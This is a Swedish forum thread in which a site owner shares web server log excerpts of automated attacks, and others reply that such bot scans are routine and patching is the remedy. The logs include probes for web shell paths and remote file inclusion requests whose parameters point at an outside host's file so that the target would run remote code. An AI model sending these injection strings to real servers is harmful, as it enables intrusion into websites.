Det är kul med website...

Satt just och tittade i loggen för min website. Det kanske var ett misstag, för det är rätt intressant, för att inte säga skrämmande, att se vad som egentligen händer när jag inte tittar.

Förutom de vanliga besökarna och sökmaskinsrobotarna finns massor av märkliga entrys.

Där finns de buggiga robotarna:
[SIZE=1]208.70.28.56 - - [19/Sep/2007:20:47:50 +0200] "GET /robots.txt HTTP/1.1" 200 209 0 "" "ia_archiver-web.archive.org"
208.70.28.69 - - [19/Sep/2007:20:48:09 +0200] "GET /robots.txt HTTP/1.1" 200 209 0 "" "ia_archiver-web.archive.org"[/SIZE]
(det upprepas ett par hundra gånger - den har verkligen hamrat på min site. Det är Waybackmachine, man skulle tro att en sån site hade en fungerande webcrawler, men den hade tydligen problem med min server.)


Där finns hackningsförsöken (nedkortat - det är flera hundra rader egentligen, de letar efter kända buggar i t.ex. Quicktime och PHP):

[SIZE=1]4:44 +0200] "GET /phpmyadmin/sql.phpmain.php HTTP/1.0" 404 629 187 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:44 +0200] "GET /phpmyadmin/sql.phpmain.php HTTP/1.0" 404 629 187 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:45 +0200] "GET /shell.phpmain.php HTTP/1.0" 404 620 125 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:45 +0200] "GET /shell.phpmain.php HTTP/1.0" 404 620 125 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /P/M/A/main.php HTTP/1.0" 404 617 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /P/M/A/main.php HTTP/1.0" 404 617 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /cmd.phpmain.php HTTP/1.0" 404 618 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /cmd.phpmain.php HTTP/1.0" 404 618 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/cmd1.phpmain.php HTTP/1.0" 404 630 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/cmd1.phpmain.php HTTP/1.0" 404 630 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/cmd2.phpmain.php HTTP/1.0" 404 630 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/cmd2.phpmain.php HTTP/1.0" 404 630 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/cmd3.phpmain.php HTTP/1.0" 404 630 47 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/cmd3.phpmain.php HTTP/1.0" 404 630 47 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/sh3ll.phpmain.php HTTP/1.0" 404 631 0 "" ""
87.242.74.142 - - [30/Jun/2007:08:04:48 +0200] "GET /phpmyadmin/sh3ll.phpmain.php HTTP/1.0" 404 631 0 "" ""
[/SIZE]---
[SIZE=1]65.40.70.132 - - [21/Sep/2007:09:51:31 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://80.34.102.151/joomla/1.gif?/ HTTP/1.1" 404 399 125 "" "Morfeus Fucking Scanner"
65.40.70.132 - - [21/Sep/2007:09:51:32 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://80.34.102.151/joomla/1.gif?/ HTTP/1.1" 404 399 141 "" "Morfeus Fucking Scanner"
65.40.70.132 - - [21/Sep/2007:09:51:32 +0200] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://80.34.102.151/joomla/1.gif?/ HTTP/1.1" 404 397 47 "" "Morfeus Fucking Scanner"
65.40.70.132 - - [21/Sep/2007:09:51:32 +0200] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://80.34.102.151/joomla/1.gif?/ HTTP/1.1" 404 397 47 "" "Morfeus Fucking Scanner"
65.40.70.132 - - [21/Sep/2007:09:51:33 +0200] "GET /cacti/include/config_settings.php?config[include_path]=http://80.34.102.151/joomla/1.gif?/ HTTP/1.1" 404 400 0 "" "Morfeus Fucking Scanner"
65.40.70.132 - - [21/Sep/2007:09:51:33 +0200] "GET /cacti/include/config_settings.php?config[include_path]=http://80.34.102.151/joomla/1.gif?/[/SIZE]


Och där finns mystiska intrångsförsök jag inte förstår:

[SIZE=1]
216.184.127.172 - - [21/Sep/2007:10:57:36 +0200] "GET /cacti/ HTTP/1.0" 404 609 0 "" ""
216.184.127.172 - - [21/Sep/2007:10:57:36 +0200] "GET /cacti/ HTTP/1.0" 404 609 0 "" ""
212.255.1.199 - - [21/Sep/2007:11:53:52 +0200] "GET /cacti/ HTTP/1.0" 404 609 0 "" ""
212.255.1.199 - - [21/Sep/2007:11:53:52 +0200] "GET /cacti/ HTTP/1.0" 404 609 16 "" ""
81.243.253.39 - - [21/Sep/2007:19:19:34 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 404 619 62 "" ""
81.243.253.39 - - [21/Sep/2007:19:19:34 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 404 619 62 "" ""


[SIZE=2]Min site har varit igång ett par år och såvitt jag vet har aldrig något allvarligt inträffat, men det är inte utan att man blir lite mörkrädd när man ser att nästan en fjärdedel av alla entrys i loggen är hackningsförsök...

[/SIZE] [/SIZE]

hehe lurigt sånt där.
vad är det för hemsida du har?

Jag har samma på mina servrar, det är ju botar som bara kör runt på nätet för att leta efter kända buggar, egentligen inget att bry sig om, inte så länge man kör med dom senaste fixarna/patches hela tiden, det trista är att det ska behövas, men så är det, det som är mer skrämmande är att se vad som försöka komma in på ens egen dator, jag har en dator som står som separat brandvägg och den loggar allt, och det är fruktansvärt så många olika försök det är hela tiden, och tyvärr är det ju oftast "zombies" som söker efter hål, så det är svårt att hitta vem som ligger bakom.

Brukar tömma skiten när den når 100Mb, vilket tyvärr händer lite väl ofta.

Man har ju hört sköna exempel på folk som missat lite och har loggar på flera gb'n :) Totalt onödigt.

//C